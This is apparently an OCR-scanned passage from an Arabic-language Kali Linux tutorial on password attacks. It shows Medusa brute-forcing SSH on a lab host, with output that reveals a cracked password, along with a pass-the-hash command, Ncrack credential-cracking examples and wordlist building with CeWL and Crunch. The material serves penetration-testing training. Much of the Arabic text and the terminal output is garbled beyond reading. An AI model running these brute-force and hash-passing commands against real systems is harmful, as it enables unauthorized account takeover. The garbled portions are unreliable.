Available modules in "/usr/lib/medusa/modules" : 

+ cvs. mod : Brute force module for CVS sessions : version 2.0 

+ ftp. mod : Brute force module for FTP/FTPS sessions : version 2.0 

+ http.mod : Brute force module for HTTP : version 2.Q 

+ imap.mod : Brute force module for IMAP sessions : version 2.0 

+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0 

+ mysql.mod : Brute force module for MySQL sessions : version 2.0 

+ ncp.mod : Brute force module for NCP sessions : version 2.0 

+ nntp.mod : Brute force module for NNTP sessions : version 2.0 

+ pcanywhere .mod : Brute force module for Pc Anywhere sessions : version 2.0 

+ popS.mod : Brute force module for P0P3 sessions : version 2.0 

+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0 

+ rexec. mod : Brute force module for REXEC sessions : version 2.0 

+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0 

+ rsh.mod : Brute force module for RSH sessions : version 2.0 
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: JVI £Lj) jjjla dp Medusa Jl J^ajJt UajI 6^ 
Applications | Kali Linux | Password Attacks | Online Attacks | medusa. 

<J jLaJ jll ^Vlm^l ^joj! <LajUj jl ^Aa^Luid ^sjail 6L_flA3.Il XP (j^ J^" J ^ dlLi jls_x_l (j* dAC Jl ^t___J tLui jAjLg ^hVlmt <J^-t (j* 

4<J J--A31 ^l^jaaJ A_C 1^1a__1ujV JJJ-^l ^ (j* «^3^*^l J^ L$J^£ L$'^ ^--^l L-flLa jl JJJ~> 4-x_£ j <J J--A31 (J^ > uJ J l^lAalLual 

.Ija^I ILLoj Ulxi L__ Iaa j l^jt-o ^aL-__aI! J Jill <x>a__]1 ^\ j 
ttiL *u_aL_Jl jjoJI ^ j-oli ^Liul ^ ^j-^j . (Dictionary list)^ o^lcl 6jj£ya~_1 cA ASal^ll ^ sa_J j 

. ^jJ-dl^xJI (jj<oVim^t ^j* <L<_jI_ jj_ j!i J l_jc. jj el u£ lit jl a_J j AAaajoi^ ^xjojU el j----t * ^ ^ J J^*^ l— lj£ tit JJ-- (jl t_jjLt3 
s-LgjujI ^a^. J ^- du£ li] ^ tAii ^jl ajjj a__ 6(j^A__lo_<_Il ^Uijojl <L<*_1_ <^a ciL (j_aL__Il ^^UalajVI <A*c> lLu^S tij 

6 .harvester ^ ^g* ^> ^- Jil J jj-^V^ -^o^ u^j^ c ' l>* ^^---l J^ j^j-^1 J J 6 jjj^ ^ ^ j uj^ ^ '^"^l 

• O^J- - ^A__luix_l ^joil aJ jj J 4^lA__luil (j^-aJ JjJ-£-\Vt ^J^t (jl J-C- (j-* JjVI £ j^Jt U' llA^ 1 ^ (j - * J 
Cln£ ;<__]i .(jj^ jAU ^LqA^LuiaSI ^L-uil (j* J Jc JJ-*-ll (j* (j - ^-" ^ (J^al^Jl (jljli-VI J^A^ 1 ^ cJ^-^- (J^J^ 6 JllxJl (J^f^ (^5^- 

^UjojV ^Uijj j jlrk ^ jj tLojj^ ^l^kiojl . ben.owned@example.comg r i jj : ^)n ^jjJI u^j^ ' 

townedb 'bowned Renowned 'ben.owned lU^j .^jj^IVI ^jjJI u^j^ u j^^ ^ o^ ^^ 1 ^^ 

.Asu ^ Aii- ^^ l (Jjjla Jl (brute force attack) <^l*Jl s j^l ^ ^i^ j Loj 
jlA^alj Jlixi jj31 Aft a) Aiajj J^l (j>» .LajjAixi J^-^ ^IaxI^jI (j^ja 4 JaVl Jc a^Jj ^a^L^ ^jIj jjj>J1 

:JWl 

#medusa -h target ip -u username -P path to password dictionary -M authentication service to attack 

\Al (j^aLkll t flA^Jl (jC CllLa jlx-<Jl (j^aJj^iJ ^1 ^tlaJ L_fl jjuj 4 (Jj> Sllll ^jxa Aj j>» J-^Vl 1a&> <joj1jA3 LlA <JiaJ L_fl3 j±i 

.c_flA^!l c ip jl aja^j] "-h" f I^IujI .brute forcing " medusa" J jVl ^IaI^I ^Ia^IojI ^jj dii^. 

S-LgjojI (jxi ^LauU c _ LoS tit . J J^-^t cJj> > >1 *^ ^ jl ^ ^1 Ijoj jAj-g ^LdA^JjoaJ L_fl jjuj ^^1 A^.1 j ^Vlma ^joj! ^^Jc 3JVa13 "-u" ^Ia^JjojI 

^All c aLll jLoiaj lc jiLd " -U" jjnsull jlAj^al Aft a) t^jlill ^ *^jl jll ^UjojVI c> lS^ J j^tt jU^ ^ 

jlaJ 4_AjUi AjA^j] "_P" ^alA^Jjujl ^aJJ (j^ 46A^.lj JJJA AjA^j] ""P" f ^ ^^jI ^xjj 4(JlxJljj ^^j^A^Jjol/Jl ^UujjU Jc ^ji^J 

^1 ^AiJl AjA^j] "-M" ft.V^'nt (43 -O 3 c cJ*^^ 2^ ^ Jf^ UJ^ ( : 1 >J "-P" -JJ^ ^-jIaK ^ AjAxJI 

AiiJl j ^j i ^M (-n port_number) ^l^^l U-ajt cil^j .l^i^l^ ajjj 
j^Lk ."Example.com" l3^j^-^^ j^^^ ^1 j^-V ^^^l ^ ^ ^> o^j^ .cJ^ll Iaa - iklujj U jca j^-!l Iaa ^i^a j^J 

a^j .192.168.18.132 c> IP u'j^j "ownedb" r ^l^l ^1 c> UL^l a^ ^MetaGoofil M c^ 1 ^UjkJI ^ 
<j ^USII pU^Vl Jjl c> Sa^I j 43 S jla^Jl Jl JllijVU .22 ^1<J1 J^-^l ^ SSH ^i^l J < ^a^SU 3^UJ1 AaUJl ^-a^i 
; Jtlll j-«Vl jlAj^aV (j^j 6<Ia^xi ^» jl^aJI JIxIujI Asu .^ILJl Jl Uljjia J brute forcing ^ aJjL^ 



#medusa -h 192.168.18.132 -u ownedb -P /usr/share/john/password.lst -M ssh 



J& l g U igl Iaa I^LuIj Jll ^ j^Vl CjI jaVI c> ^1 jl) lw jjj-a J^ J j>^t J J£UU1 ^1 <^1 jj IaI 

;AJU31 ^gI jVI ^ Ijuj jAjLg C-ujjj SaIcI cil^Qj .^xilj^Jl ^nn'i SaIcI m*a\\ (j^ (jj^j as 4 J^ (j-« ^ (j^al^Jl jIa^VI 
#apt-get remove medusa 
#apt-get update 
#apt-get install medusa 
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e, edit tfew Terminal Help 

>tgbt:~* -cciuid h 192. 168. IS, 132 -u owned& -P /pinU'sr.^as^words/joriivpa &iwor<}. L&: 
Jus a v2.1.1 [http://www.focifuS.neti <C> JaHo-Kun / FoofuS Networks <jmk#f«f us . net> 



■password: 123-456 U gf 35*6 complete* 
I ACCOUNT CHECK: [ssh| Ko&t: 132 j 1*3- 1*. 13? 
I Password; 12345 <j of 354& complete) 
ACCOUNT CHECK; [S5*| Host; 192 . 168, 18, 13? 
Password: password (3 of 3546 complete) 
ACCOUNT CHECK: [sshj Host: 192 . 1*8. IB. 132 
Password: password* {A of 3546 complete! 
ACCOUNT CHECK: [ssh! Host: 192 . 168. 18. 132 
Password: 123456789 (5 of 1546 corplctel 
ACCOUNT CHECK: [*shj Host: 192.168.18.13? 
Password: 1234S&78 (6 of 3S46 complete) 

■VCCCir CHECK: [*£h] Host: 192 . 16EL IB. 13? 
Password; 1234567$9B O of OOflpUte.) 
ACCOUNT CHECK; [S5*i] Host: 102.168, 18- 1JJ 
Password; abcI23 iZ of 3546 complete* 
ACCOUNT CHECK; [ssM Host: 192. 168. IB. 132 
Password: computer (9 of 3546 conptete) 
ACCOUNT CHECK: [SSftj Host: 192.168,16.132 
Password: Th36^slCS (18 of 3546 complete} 
ACCOUNT FOUND: [sshj Host: 192.168.16.132 
rQot^bt:---* 





91 




0 complete) 


user: 


owjtedb 




Of 




D 


complete) 








8 complete! 


USCI : 


□wrredb 




of 




€ 


complete) 




of 




9 coaplete] 


user; 






ri 




9 


complete) 




pi 




8 complete] 


User: 


Owfvedb- 




of 




& 


complete) 




of 




8 COftpLete] 


User: 


ownedb 




c: 




& 


complete) 




Dl 




8 complete) 


User: 


own*db 




M 




9 


complete) 




cri 




8 complete] 


User: 


owttedb 




of 




D 


complete) 




of 




8 conplete] 


user; 


owfiedb 




of 




9 


complete) 




of 




8 complete] 


user ; 


owtiedP 








0 


complete) 


' 1 


0? 




0 co-pleiei 


user: 


owftedb 




■y. 




& 


complete) 




owned b Password: 7h3B$SicS \ SUCCESS] 







Using medusa to brute force into SShL 

£L*liji3! lAJJ LgAjO IgjJajC ^JJ c _^j3I <^-^ jjajudll S^LuJ! U3Hg ^ LLLui UjSi LaS oljj^al J-*V1 JjVl JiajudSi J^-iaJ 

" l_j Iajj ^^jII a alia j^Jl CjIaKj " ownedb " - ^1 ^ JVI J j^-^ diVjl^* (j-* <LudLuj j^Jaii 4_jLl<JI jlajoaVl .J-**-^ 

^jujI ^I^JjojU ^Uaill J jj^ jll ^ LoJ j^J-Q CllaLaJ Cilia. 4<J J^^Jl (Jj> * ^ ^ J^"*^) t — ^ 1 1 J^ t>1 ^ (jg& -la^V ." 123456 

^ia J^Lk ^> axj ^vim^ l fJu J^kJI ^ (jjj^la ^ 6 ^ ■ (Th3B@sics) jj^ ownedb " ^ v^ ». m 

:^Ult LjI jit j!>U <> SlA) Jj^au Liaj) dli^j 

http : //h. fooflis .net 

Passing The Hash ^ Medusa ^l^-il 
PWDump op I jS Medusa c^^^ .Pwdump j SAM^» c> ^ t^H c> ^ & 

#medusa -H hosts.txt -C pwdump.txt -M smbnt -m PASSrHASH 

JIoaS ssh liai^luu! Clu^ Jlla (J&jIS jlA^I ^Jjjla <j£ (illLaj medusa J- 4 U^*- 4 JjSjjjjj aI^aIi nl 

#medusa -M smbnt -q 

Ncrack - Network Authentication Cracking Tool 
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<^ .Nmap o-aaill sbl ^ ^jlj^U l^j^^ki^j ^ jJI Ij^j^I " jjSl^l" (auditing) o«ai ^ Ncrack ^ 

j£l^JI ^ixlaaj 4_1^.^<J! dIa jiii* ssh ^ j^-j jj-^j f ^^"'^ ^Uaill ^jl U3 1 (j I clA^ Nmap ftbU ^a^ill AaO 

.(CjV j£ jlij^)JI) CjUj^JI o^J jjuJI < ** il (J j^. (jjixL^jll CjIj^U JjljlkVI j;*^ A j\ 

Ncrack ^Ij^j nmap J 4^L^ j*!jVl *Uj 4 (modular approach)^^j^ f'^^V? Ncrack r \^ > ^ ^ ^ 

.c v^ti ^jc djLi jlx^JI ^jjjLojI Jc <Ajla j <illk-<J! djVl^. t oft n ^jl (j^j c,5-^(dynamic engine) 

Sjj LIaH brute forcing ^ <J ^^^Jl *4<^*u c^ULac, ^^jjoiaII <J>»l£3l ^£^j3I ^i<J 4-^-*-^ Ncrack 
jji&Jl c>» U j Nmap J^*-^ ^ j J^l^ll ^hvimVI 5J j^aJ (timing templates) j^l ^-jj 64jU13 j 

RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet 

CjI^ j Jc ^ jiaJ lg_&3 .WjjSj cjVUJI J£ 4_iSaij3 ^L»l& ^ (default parameter) j^VI dXilxxJI jl ja JS ^J^. 

m a1 j^oij a^jaJI jj6 AjflljJa! CjV j£ jj jjJ ^c^SI ^jAxuj ^joij ^1 (modular architecture) iuji^JI 

http://nmap.org/ncrack/ 

Applications | Kali Linux | Password Attacks | Online Attacks | Ncrack. 
#ncrack [<Options>] {<target specification>} 



$ ncrack 10.0.0.130:21 192 . ICS . 1 . 2 : 22 

Starting Ncrack 0 . 01AI.PHA ( http://ncrack.org } at 2009-07-24 23:05 EE ST 

Discovered credentials for ftp on 10.0.0.130 21/tcp: 
10.0.0.130 21/tcp ftp: adiain hellol 

Discovered credentials for ssh on 192. ICS. 1.2 22/tcp: 
192.16S.1.2 22/tcp ssh: guest 12345 
192.163.1.2 22/tcp ssh: adnain money? 

Ncrack done: 2 services scanned in 156.03 seconds. 
Ncrack finished. 



■UJ^^*^' 1 ^^ c — ^ -( - U) 

. jjoJI CjUK c_aL ;(-P) 

^ laajudAjl ^jujI ;^ — user) 
.^Uaj l^iix^kj ^Jil! jjuJI :(— pass) 
.^>xJI cjUK J!^lk J£3 u^^^ jj^ : (--password- first) 

.(jji Villi jl^al ^ ^il3 ;(-V) 

.IPv6 ^j^l c> ojj^^ V^ :(-6) 
Target Specification 

^j^j iajudjl .^-i^JI cAjjjaJI 4Jl (options) IjV^ Ncrack j- 0 ' j> ^ ^ J^l^l ^ 

aw u^n Aij^su ^ l^a. Ncrack .ajl^^l ^I^aVI ^ j^il ^L»^kll ^•^j ^-^j' ^^i^j .< * a j tU ^ ^1 jl < *°^^ IP q\ jjc 

.Nmap ^ ^>ikiujj ^\ Jid ^^kJl/ 
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Liajl j cjII^JI Jtkj Liajl (j^j jjfL Ja jlli Vj (multi hosts) < ^ J&l ^>j*j Ncrack 

-g JU3! JliJI ^ dIjj lJj^ CIDR-style addressing 
#ncrack scanme.nmap.org 192.168.0.0/8 10.0.0,1,3-7.- -p22 

i^Vl^ uj^j>^^ Ncrack ^ ^j^j ^1 Cj^U^JI o^*-* ^jil j 
-iX <inputfilename> (Input from Nmap's -oX XML output format) 

.xml Sjj^ Nmap 5^ uj^ cs-*^ j c frj^^l ^L^l ^ <Lajta s^ljal L_flj^x!i3l ^ 
-iN <inputfilename> (Input from Nmap's -oN Normal output format) 

-iL <inputfilename> (Input from list) 

—exclude <hostl>[, <host2>[, ...]] (Exclude hosts/networks) 
—excludefile <exclude_file> (Exclude list from file) 

.L_aL» 6^)3 jlxa C5"^J sJJ 0 .. 1 <a^ll (j-a 4_ajUj xo^l jJJauli ~ laJLujJ 

Service Specification 

L_a jjuj tiljli ^Ncrack lS^*-^ .l^nlaj ^iJ 4 alia a Cj! jLik ( . u£ jj3 ^ajujj <L^)iaj Ai^jjab<JI L_flj^su ^ ^jjlsuj lLu^. Ncrack 

^^-x-kal jJflVI ^ilftll ^Sj (Jjjia (jC- <LaliJl ^j^j] (Jjia Ncrack J^J^ J>(S^ J ^-^JJ J c JaVl ^^Jc ^U»J 

^ jj ^jojI J£ ^j*^ .1 agjK jl (ncrack-services^-^ cs* ^j^^^ ^ ^) W-*^ t>» jl ^ <j-aUJI 

;LaA j lJ^JI CjUi^kll ^^ic l^nlaj ^liuj ^^jII j l!i j;L<»l<i ^jULjia Ncrack 

per-host service specification -1 
global specification -2 

Per-host service specification 
Aiuj^a (j^aj lie <j| ^^-istj li&j netmaskj ( j^j^^) wildcards ^i.m j ^joij < a>^JI •^ c - ^ 6 J L P c - y ^^ 4 

<[service-name]>://<target>:<[port-number]> 

^li Jli. 



ncrack scanme .nmap. org: 22 f tp : //10 . 0 . 0 . 10 33h : //192 . 168 . 1 . 



Global service specification 

. Per-host service specification^^^ <^AkJI J^jj ^ Jal jjj ^3 ^1 Sj^VI j^aJ ^^ajll liA ^ A^Akil aj^j ^jj 

-p <[servicel]>:<[port-numberl]>,<[service2]>:<[port-number2]> v .. 

ciUi Jli* 



? ncrack s canine .nmap. org 10.0.0.120-122 192.168.2.0/24 -p 22 f ftp : 3210 f telnet 



Ajc j3 <c a j\ J^ll C5 ic l^jjfkj (j£-oJ ^jII dit jUaJt ^ ^jAslSI jj3 j!L till ^joij Ncrack t^-ab-l! dlLolkll AjAaJ ^jc jlaill 

^jUl ^> 3^ jjia <c ^ CjI jUkl) clA^ .HTTP *^ jU ^5^^ URL (module-specific parameters) 

Per-host options, per-module options and global options 
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Per-host options -1 

< [service-name] > ://< target> :< [port-number]>, <optl>=<optvall>, <opt2>=<optval2> v .. 

per-module options -2 

-m <service-name> :< optl>=<optvall>, <opt2>=<optval2> v .. 

global options -3 

-g <optl>=<optvall>, <opt2>=<optval2> v .. 

:JN\£ CjU±kI2 4^11*1! CjtjLpJb <Uil2 Jj ui 



ssl: enable SSL over this service 

path: path-name used in modules like HTTP (■=' needs escaping if used} 

cl (min connection limit} : minimum number of concurrent parallel connections 

CL (max connection limit} : maximum number of concurrent parallel connections 

at (authentication tries} : authentication attempts per connection 

cd [connection delay} : delay time between each connection initiation 

cr (connection retries} : caps number of service connection attempts 

to (time-out} : maximum cracking time for service , regardless of success so far 



Output J- 

_ j-aVl ^cjU Jai^. <L^)]a ^jJa jJ j (J^asu Jj Lu3 j Ncrack ,J*VI Ctij^J ^-^^ L>^ 

-oN <filespec> (normal output) 

-oX <filespec> (XML output) 

-oA <basename> (Output to all formats) 

http : / / nmap . org/ ncrack/man . html 
http://nmap.org/ncrack/devguide.html 



Password Profiling (Word list or Dictionary file) 



jl World List ls j^' *^ (i^kj cs^' j (Dictionary list)^ j*^' yr* * jj^^ CjUlSaiJI ^ s^l j 
^ Lf&\ a ^^\ A \ cjUKI a^j\1 *Uj 4_iLc ^Ij is j^ U-*^ ^J*^' J o^j 'Password Profiling 



jill CjUKII ^> ^VVl J^ ij jI^j I^jV l>^I js3I pj! 

djli cjUJ^II ^ Ia jjc. jl dog j^ Barfy ^ uj^ ^ j^ jjj - ^^ ^jl ,^1^ jli tillil t^lUJI J ^-c^ 1 jffi Barfy 

jjj^II ( . lliaJJ Ullc. ^j^3 j Ajliil ^iLd (jj^J (jl (j^J ^J^ll (Jjj ^dlflll . JjoJI CjI (j-d CjIjULJI J^ jl (^^1^31 Jc ^jliJj djjU 1 

m AjLS>\ J^ jVI 4_i3\Aj 4 lajudlaj AiJaJ (Jjj^I .4iUaj Jc Jali^Jl ^Uu^Vlj difl jll (j>» 
^I^jjujI (j^J ^ * \*\*\\ (JjJI (J' J^- J^ ^-^V S^jujIaa JJJ - ^^ ^-aK L_alxi ~1 laJL ul ^ j£ <Lj JjJ-^l ( J ^ JJ 1 "^'^ ^^^^ ~ a 
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jl ^Jl ^UijVl jl L_flj^.Vl (J^asu (jlijjj CliLaKll 4_ajUj ^ ^ j^. jaII jaJI t ** )1 &K £J*^ iL^jl Cjlinialill (j^axJ (j^J tJllxJl (J-iJjuo ^^ic 

^j^aj aJjL^J CjIaKJI ^jjj ^a^JIj ^.Ij (jjl CjLaKII 4_ajUj cAiLJI ji&l jl j^l ^ <J-gI*jj j^-VI ^^1 jJI <jiaxjj .4_aK3I 

.^Jj 6^ jjj^IVI ^J^l U^J^ C ' J c VflgN ^J> J S-UjujI J 6A£jjoJI <*-^U ^I^JjojU <j^aLaJ) JJJ*^ ^ *K ^jI jS (j-a 

jjuJj 4_*K ^jjj ^Ui3 6^1^. JpUajl <Jakj ^Jj^jj lIujjjVI ^^Ic (j-a IgJ-La^J ^^l » JJ» 1 ^ CllLaKll ^jI j3 (J-g J^^ <ilU& 

JjlxjaLill ^aUaj ^jli tJa^Jl 6 j .till <Jjudi3lj JJdJ-al j£3l ^1 £.Uj IgiLuj 4-^.1.1^31 dll j^Vl tilUfc j .tiL <j^aLaJ) Ajj^kjuJl 

[/usr/share/wordlists] jl^l ^ ^ ^ jj^l *j .l^l^klujV Ul ^u^ulU cjUKII ^IjS JJa ^ ^ d**^ 

m ^aJlx11 cAiUJ! (_3j^. j-a i j^-^) "RockYou" ^^i^l ^1 t^ic-i cl^ cs-^ lSj*^ ls'^ 



root(&Kali : /usr/share# cd wo rdlists/ 
root@Kal_i : /usr/share/wordlists# Is 

rockyou. txt . gz 

root@Kal_i : /usr/share/wo rdl_ists# 



.[/usr/share/john/password.lst] jl^-JI yi ^ (JtR) 1^?. l^lj Sj^a cjl^ <^la LjaJ ^3Ua 

./usr/share/wfuzz/ jUJl ^ ^ ^Ij WFUZZ Multiple Wordlists c^'j <^> ! ^'j 5 ^ 



root@kali:/u5r/share/wf uzz/wordlist# Is 

fuzzdb general Injections others stress vulns webservicces 
rootftkali : /usr/share/wf uzz/wordlist# [ 



JtR Offline ^ jjj - *^ ^ j^ . JjJaaVI U^b ^jjjJ l^i^ j^VI jli 4 jjjaII CjIaK ^jI jij j*Vl (3i»lj Uilic 
jli ttilli .1^. jl£ UK jj£I jjuJ! CjUK ^jI UK jli ^ .S^l jll 4_ijlii3l ^ jjuJI CjUK ^ j^XJI ^JUj 

Sa^I jll A-ijliill ^ j^^ ^ ^K ^j-<i jl ^.1 j <^Jlx-<i ^^ic oj^la ^3 I j^JI j Loj j^<Jl c5 J^' JJJ - ^^ ^ ^ JJ * ' 1< ^^ CjLuSj 

j^ CeWL ^Ij^VI .tiL 4_j^aLk aju^lA wordlists ^U^j j>» ^ ^Ij^VI j>» ^j^xJI j^j^ lS^^-^I ^Uaj ^£ 
^ajujj 1^. <iila3 obi Crunch . t —^ , ^l j^*-* ^^A^VI c^^ 3 jj^>^^ ^ A ^ *\-^\ ^ (J^l 

. ji^all tiL 4 > ^al ^ II <j^aj^a^xJl WOfdHstS 



CeWL (Password Profiling) 

Ljajl 1 g j£ ajj tc_ ia ill ^1 ^ <j ^ j£i Ui JiLd (3^*^ URL u^j^ c ' C5^^ j^^^ f C5^^J Ruby ^-?^j^^ es-^ ^jj;^ ja CeWL 
^^jII CjIaKII 4^jla ^L^.jU ^jIj Asu l-lu^ C5 1c ^1 UjUlkl l_a^JI ^ ^<J^ ^-lafij>JI 4_i^.jLkJI ^jjllxJI ^jjj 

I^Ull iajljll 6jUj clA^ 'CeWL (J djLd jlx-<Jl ^ jxJ .JtR J^^ ^aK Jju^ ^ l£J^-^ CjlknJalll (j-<» 1 a *\ iklLujI 

http ://www.diginini a.org/proi ects/cewl.php 

I^VI ^liSl (Jjjia JC t*Ui ^aJJj .4^l^kloj| till J^-SaJ ^ jjuj ciUi ^suj 'CeWL ^I^IojVI CliU jLl-g ^1 V jl jlaJJ UcJ 

Applications | Kali Linux | Password Attacks | Online Attacks | CeWL 
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CeWL 5.3 Robin Wood (robin@digininja.org) (www.digininja.org) 



/us r/lib/ ruby/1 . 9 . 1/ rubygems/custom_requi re . rb : 36 : in "require 1 : icorw will be de 
precated in the future, use St ring#encode instead. 
Usage: cewl [OPTION] ... URL 

--help, -h: show help 

--keep, -k: keep the downloaded file 

--depth x, -d x: depth to spider to, default 2 

- -min_word_l en Q" |: hr -m: minimum word length, default 3 

- -of fsite, -o: let the spider visit other sites 

--write, -w file: write the output to the file 

--ua, -u user-agent: useragent to send 

--no-words, -n: don't output the wordlist 

--met a, -a include meta data 

--meta_file file: output file for meta data 

--email, -e include email addresses 

--email_file file: output file for email addresses 

- -meta-temp-dir directory: the temporary directory used by exiftool when 
parsing files, default /tmp 



KMLO HOCOQDES 



--count, -c : show the count for each word found 

Authentication 
- -auth_type : digest or basic 
--auth_user: authentication username 
--auth_pass: authentication password 

Proxy Support 

- -proxyjnost : proxy host 

- -p roxy_po rt : proxy port, default 8080 

- -proxy_username : username for proxy, if required 

- -proxy_password : password for proxy, if required 



^j^la ^ jLoJ! JJJ*J (j£-dJj t^Cli^Jl CIAAjzC Ja. ja. JLa Cli^Jl j>» A a iklLujj ^£^1 L&^) 5 jffi*^ S- 5 J^" ^ iklLujl j 4_i^.jLkj| 

#cewl [OPTION] ... URL 

#cewl -w passwords.txt http://www.digininja.org/projects/cewl.php 



Crunch 

# jjj-<JI dLaK jj > cjllnJaj l^l^klojl (j^-GJ ^jII j t^L 4 > <nl -^l djUJ^ll ^jI e-LSuV ^^u>n obi Crunch 

^hVu u\ ^jjjia ^ *^ j ^Crunch v 4 Sj^Lu^I cjK;^ ^Jj Jj^a jll 



#man crunch 
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CmilCh IjJsjI .'La^Vlm^! L_flj^VI ^jjj J jiall > ^aiV) ^aJl j ^^Vl .^Jl CrUnChcS^*-*^ ^J] ^ (JJJ^Vl ^ 

c# j 1 ^ ^ [/etc/share/crunch] ^&3! J-^ ^ Aj^j^I charset.lst ^l^a^l ^ o 

ojU^Vl jl jLoiaII 11a ^ crunch lS^*-*^ ^ j^j t^Uil .u^^ ^ ^v^n l_a jjoj c _^j3I ^cl j£3I 

^ JjAslSI ( fliali (J^-^ t — ^ JjJaixJl ^j^a jj^aill jj^oj ChaFSet.lst t ^s^- (-1^1*^^ •iJ ^jUtj ^U£13 

Sjjj^lL ^jJa j-a ^ La£ j-dlil! (jj^J (jl IA13JJ ^^jll L_fljL^<Jlj O^clill ^jojI (j^A 3 (JC- c^lj 4 > *at ^ D^clfl ^Luljlj ciLlo 



fit charset configuration file for winrtgen vl . 2 by Massimiiiano Montoro (nao@oxidl.it) 
I compatible with rainbowcrack 1,1 and later by Zhu Shuanglei <5huanglei@hotmail,cori> 



ny_rule 
hex - "lower 
hex-upper 



numeric 
numeric -space 

symbotsi4 
symbolsl4- space 

symbols-all 
symbols- all- space 

ualpha 

ualpha- space 
ualpha- numeric 
ualpha-numeric- space 
ualpha-numeric- synboll4 
ualpha- numeric - symbolic -space 
ualpha-numerlc-all 
ualpha -numeric -all -space 

lalpha 

lalpha-space 
lalpha-numerlc 
lalpha-numeric- space 
lalpha - numeric - symbol 14 
lalpha-numeric- symbol 14 -space 
lalpha -numeric -all 
lalpha-numerie-all - space 

mixalpha 
mixalpha- space 



dJl^LJI ^1 = [I51Z3456789u#@! ] 
= [01Z3456789abcdef ] 
= [01Z3456789ABCDEF] 

- [01Z3456T89] 

- [0123450789 ] 



[ j ms%^H )-_+=] 



= [E@#$K A &*£>_+= 



'[]{}|\:; ,M <>^/ ] 



[ABCDEFGHI JKLRNOPQRSTUVWXYZ] 
[ABCOEFCHIJKLKNOPQRSTUVWXYZ ] 
[ABCDEFGHI JKLMN0PQRSTUVWXYZ01Z3456789] 
[ABCDEFGHI JKLMNOPQR5TUVWXYZ01Z3456789 ] 
[ABCDEFGHI JKLMN0PQRSTUVWXYZ01Z3456789 ! @#$% A &*( ) ■ 
[ABCOEFGHI JKLMN0PQRSTUVWXYZ01Z34S6789 ! pS% rt &*< ) - 
[ A8CDEFGHI JKLMN0FQRSTLIVWXYZG1 Z3456789 ! @J?S% rt &* ( ) - * [ ] {} ] \ :;"'<>, k 7 / ] 
[ABCDEFGHIJKLMNOPQRSTUVWXYZ01Z3456789!pS% rt &*C)_^ [] {} I \ : J r " <> , ■ . ?/ ] 



] 



[abedefghi jklmnopqrstuvwxyz] 
[abedefght jklnnopqrstuvwxyz ] 
[a bcdefghijklmnopqrstuvwxyzOi 23456789] 
[abcdefght]iklmnopqrstuywxyzOl 2 3456769 ] 
[3bcdefghijklmnopqrstuvwxyz0l234S6789 ! ) -_+=] 
[abcdefghiiklrtnopqrstuvwxyz01234567fi9!@#5^ A fi*C)- _+= J 

[abedefghi jklnnopqrstuvwxyz01234S6789 ! @#5% A &* ( ) - []{}] \ :; M '<>,.?/ ] 
= [abedefghi jklnnopqrstuvwxyz01254S67fi9 ! @#5* A &*( ) [] {} | \ : ; H " <> , . ?/ J 

[abedefghi jklnnopqrstuvwxyzABCOEFGHIDKLKNOPQRSTUVWXYZ] 
[abedefghi jklnnopqrstuvwxyzABCOEFGHIDKLKNOPQRSTUVWXYZ ] 



(jjjla (jf* l^J ^jiaJL n| Jauijl £a crunch SUVt ^li^lujb I^j UjPJ 



root@JANA crunch 


13-o Threel_etters.txt 






Crunch will now gene 


5 rate the following amount 


of data: 72384 bytes 




Q MB 








Q GB 








0 TB 








0 PB 








Crunch will now gene 


^ rate the following number 


of lines: 18278 




100% 








root@JANA :~# | 









;(Jjj£1! 11a ^ UjJj Sjjij^all <±ijj^UI J£ ^^ic (J^lL-^j ^j^. ^-^j-* 

a, b, c, d, e,f,g, h, i, j, etc--- 

aa, ab, ac, ad, ae, af, ag, ah, ai, aj, etc - ■ • 

aaa, aab, aac, aad, aae, aaf, aag, aah, aai, aaj, etc--- 

^1 l!^^ ^ " Ui]A ^ L-Sjl ^ a\\ ^j^^ ^j-Q j.<u.uij aj^j -^-i j <— 1^ (JjjIjujVI ^ crunch cJ^^^ Iaa 
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i^Vl^ crunch CjljLikJI ^l^kiujU I laSxj ji&Vl ^jI o^*-? Jj^j <— i es-^-^ J^JI 



rootgJANA :«-# crunch 3 4 abcde 


>1234 -o Threel_etters2.txt 




Crunch will now generate the 


following amount of data: 


35721 bytes 


0 MB 






0 GB 






0 TB 






0 PB 






Crunch will now generate the 


following number of lines: 


7290 


100% 






root@JANA:-# | 







l_j i^jj L— iia .a212j bb3j aal ^ Ulli* Sjj£aa1I <j£ j-q ^js ^Ji cj! <jc. ajUc- < ** d L_aL» 

.4444 s- 3 c^^j aaa 

^jojI o jLai* o j^iia /usr/share/crunch/ jt^l ^ ^j^j* L_aLJI 11a j j-atlll ^jjj yr^ ^ J^' J ^ j^VI 



<Ljj L* L^Lo jl^jj jj^AxJI L_aLJI lA^Uijajlj 4_^il<J! dL^j^jauli Ai^stxJj .crunch Jj"^*^ ^ a ul ^jc a L£ uall 



root@JANA :-# crunch 3 4 


-f /usr/share/i 


: runch/< 


:hai 


rset .1st hex-lower ■ 


-o jana.txt 


Crunch will now generate 


the following 


amount 


of 


data: 344064 bytes 




G MB 












G GB 












0 TB 












0 PB 












Crunch will now generate 


the following 


number 


of 


lines: 69632 




100% 












root@JANA:-# | 













:-# cat /usr/share/c runch/charset .1st 

# charset configuration file for winrtgen vl.2 by Massimiliano Montoro (mao(aoxid .it ) 

# compatible with rainbowcrack 1.1 and later by Zhu Shuanglei <shuanglei@hotmail .com> 



BBTntaWtn = [0123456789abcdef] 

hex-upper = [0123456789ABCDEF] 



charset.lst L Sjj£aa1! ^ pjS ^ ajl^u qa uj^ ^—^-^ ^ Jtl<JI 11a liaS ciiia 

.ffiu^j 000 m ^Ktt ^ di^ 0123456789abcdef ^Vl ^1 ^ ^Ij hex-lower ^ 

Ajlliill j A-ljliill 3jLkj| (JJ^J djULk (Jjia^. ^^ic ^jj^j ^jjj j-dli .lijl ^LIa t J^^^ <iajojl jlst-d djULij ^jjj J-ftC ^iLalaaJ Uiajl 

l_L<»a ^^jII l^c L<i <i djULkll ^ia^. %123% Ajuj^IU \ (J^^A 3 ^ j^*-^ ^^y^ j ^ j^*-^ j 

"a» symbols >jl J!j "%" ^J 31 w ">Jh ^ ^» J!j "@">J^ ^> >J^ 
@: Inserts lowercase characters 
%: Inserts numbers 
,: Inserts uppercase characters 
A : Inserts symbols 

